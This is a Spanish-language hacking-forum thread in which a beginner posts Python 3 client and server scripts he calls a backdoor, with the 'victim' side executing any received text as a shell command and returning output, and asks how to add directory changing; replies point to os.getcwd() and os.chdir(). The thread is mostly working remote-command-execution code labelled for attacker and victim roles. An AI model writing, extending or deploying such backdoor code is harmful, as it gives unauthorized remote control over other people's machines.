elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Ayuda] [Python] backdoor y cambio de directorio
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Ayuda] [Python] backdoor y cambio de directorio  (Leído 3,563 veces)
yomismo2512

Desconectado Desconectado

Mensajes: 8


:)


Ver Perfil
[Ayuda] [Python] backdoor y cambio de directorio
« en: 27 Febrero 2020, 03:42 am »

Hola comunidad, quiero pedir ayuda en algo que estoy realizando en python 3.

he estado realizando una backdoor en python 3 la cual ha funcionado de un modo bueno (lo cual no me espere XD)
bueno aqui dejo el codigo de cliente/servidor que realice en este script

Cliente/ atacante:
Código
  1.  
  2. import socket, subprocess
  3.  
  4. localhost = "127.0.0.1"
  5. port = 8080
  6. datos = ('localhost', 8080)
  7.  
  8. conexion = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  9. conexion.connect(datos)
  10.  
  11. while True:
  12. msg = input(">> ")
  13. if msg == "exit":
  14. conexion.close()
  15. break
  16. else:
  17. conexion.send(msg.encode())
  18. recibo = conexion.recv(10240)
  19. print(recibo.decode('ascii'))
  20.  

Servidor/ Victima:
Código
  1.  
  2. import socket, subprocess
  3.  
  4. localhost = "127.0.0.1"
  5. port = 8080
  6. datos = ('localhost', 8080)
  7.  
  8. conexion = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  9. conexion.bind(datos)
  10. conexion.listen(1)
  11.  
  12. while True:
  13. conn,adr = conexion.accept()
  14. recibo = conn.recv(10240)
  15. if recibo == "":
  16. pass
  17. elif recibo == "exit":
  18. msg = "GoodBye Friend! :)"
  19. conn.send(msg.encode())
  20. conn.close()
  21. break
  22. else:
  23. proc = subprocess.Popen([recibo], shell = True,stdout = subprocess.PIPE, stderr = subprocess.PIPE, universal_newlines = True)
  24. STDOUT, STDERR = proc.communicate()
  25. if not STDOUT:
  26. conn.send(STDERR.encode('ascii'))
  27. else:
  28. conn.send(STDOUT.encode('ascii'))
  29.  

mi duda es la siguiente, este script permite realizar actividades en shell pero muy limitadas, lo que quiero realizar ahora es cambiar de directorio y poder sabes cual es el directorio actual, se que esto se puede realizar con el modulo OS pero mi duda es ¿Como lo hago? ¿tengo que crear el comando yo mismo como una funcion y llamarla a traves de input o de otro modo?.

De ante mano muchas gracias y que tengan buen dia :)


« Última modificación: 27 Febrero 2020, 03:49 am por yomismo2512 » En línea

Un tonto con una computadora
reconFito

Desconectado Desconectado

Mensajes: 29


Ver Perfil
Re: [Ayuda] [Python] backdoor y cambio de directorio
« Respuesta #1 en: 19 Marzo 2020, 01:52 am »

Puedes utilizar la función os.getcwd() que viene predefinida en el módulo os valga la redundancia
Espero te sirva de algo.


En línea

yomismo2512

Desconectado Desconectado

Mensajes: 8


:)


Ver Perfil
Re: [Ayuda] [Python] backdoor y cambio de directorio
« Respuesta #2 en: 26 Marzo 2020, 03:14 am »

Muchas gracias por responder. El comprobar directorio actual ya lo he realizado y me ha hecho de mucha utilidad, lo que quiero realizar ahora es el modo en el cual pueda cambiar de directorio, soy bastante nuevo en python, no llevo mas de 4 meses en el, y estoy viendo mas por el lado de los scripting y pues quize probar con una backdoor bien sencilla.
En línea

Un tonto con una computadora
reconFito

Desconectado Desconectado

Mensajes: 29


Ver Perfil
Re: [Ayuda] [Python] backdoor y cambio de directorio
« Respuesta #3 en: 28 Marzo 2020, 07:34 am »

si en todo caso estas intentando acceder a un nivel del directorio en el cual no necesitas permisos y además ese directorio existe puedes utilizar  os.chdir("ruta"), caso contrario lanzara una excepción

AYUDA
Documentación de python
https://docs.python.org/3/library/os.html

Video explicativo del uso básico del modulo os(en ingles).
https://www.youtube.com/watch?v=tJxcKyFMTGo

Espero te sirva de algo y logres terminar el script  ;-)
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines